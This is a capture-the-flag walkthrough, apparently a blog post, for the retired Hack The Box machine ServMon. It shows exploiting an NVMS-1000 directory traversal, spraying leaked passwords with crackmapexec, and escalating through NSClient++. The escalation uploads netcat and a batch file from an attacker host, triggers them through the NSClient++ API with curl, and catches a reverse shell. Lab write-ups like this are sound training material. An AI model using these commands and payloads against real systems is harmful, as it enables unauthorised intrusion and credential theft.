SecWalk.com

HTB Walkthrough ServMon 10.10.10.184

Servmon has been released on 11th of April and has been retired on 20th of June. Servmon is an Easy rated machine.

Foothold

First we see we have anonymous access to FTP, there is a file that mentions there should be a passwords.txt on the desktop of nathan, after the web enumeration we find out there is a directory traversal. We can use this vulnerability to get the passwords.txt from nathans’s his desktop

User

After finding those passwords we still had to guess to who these belong, we have used crackmapexec for this. it turns out we have credentials for Nadine. we were able to login with ssh and read the user flag.

Root

After some enumeration we found a program called NSClient++ on the machine, this is not a default application, after some research it turns out this application is vulnerable to get system access.

Enumeration

Nmap

nmap -sC -sV 10.10.10.184

FTP

anonymous login

Downloading the file:

File contains there should be a passwords.txt on the desktop of Nathan

Web

http://10.10.10.184

NVMS-1000 is vulnerable to Directory Traversal

https://www.exploit-db.com/exploits/47774

Since there was a hint on the ftp we should be able to get the passwords.txt from Nathans his Desktop we do this with burp

/../../../../../../../../../../../../users/nathan/desktop/passwords.txt

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe

L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Now we have some passwords we still don’t know where to use them and to who they belong.

From the FTP we know there should be two users, Nadine and Nathan. lets try them in crackmapexec . in the ftp were 2 users nadine and nathan so i created a user.txt with these two.

crackmapexec smb 10.10.10.184 -u users.txt -p passwords.txt

valid credentials found:

SERVMON\nadine:L1k3B1gBut7s@W0rk

Now we have some valid credentials we are able to login with SSH

ssh nadine@10.10.10.184

Privilege Escalation

After some enumeration we see NSClient++ being installed which was also visible on the nmap scan, when we look at the following file we get some credentials. it also shows you cannot login from the outside only from localhost:

on the nmap we could see NSClient++ is running on port 8443:

When we login with the password: ew2x6SsGTxjRwXOT we get an error as expected, since this program only accepts requests from the localhost.

Now we can exploit this program two ways, trough the API or website. i decided to show you a combination of that. for both we need to create ssh tunnel so the machines thinks the request comes from the localhost.

Exploit source: https://www.exploit-db.com/exploits/46802

Creating ssh tunnel:

ssh -L 4433:127.0.0.1:8443 nadine@10.10.10.184

Configure Firefox to use the ssh tunnel

Now we should be able to visit the page with https://127.0.0.1:4433

We also should be able to login now:

Exploit

First step is:

Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

but since these are already enabled we don’t have to worry about that

Next step is to create a batch file and upload the batch file and Nc.exe (netcat)

In the shell I put the following commands:

powershell

cd c:\temp

python -m SimpleHTTPServer 80

wget http://10.10.14.24/nc.exe -outfile nc.exe

wget http://10.10.14.24/secwalk.bat -outfile secwalk.bat

Setup my listener

nc -lvp 443

Now it is time to exploit

Earlier I said it’s also possible to do this trough the web page or trough the api, I’m gonna show you here the combination of that:

curl -k -i -X PUT -u admin https://127.0.0.1:4432/api/v1/scripts/ext/scripts/secwalk.bat –data-binary @secwalk.bat

curl -k -s -H ‘password: ew2x6SsGTxjRwXOT’ ‘https://127.0.0.1:8443/core/reload’

Now we are gonna run secwalk from the webpage

And we receive our admin shell

Job Done

Made by S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply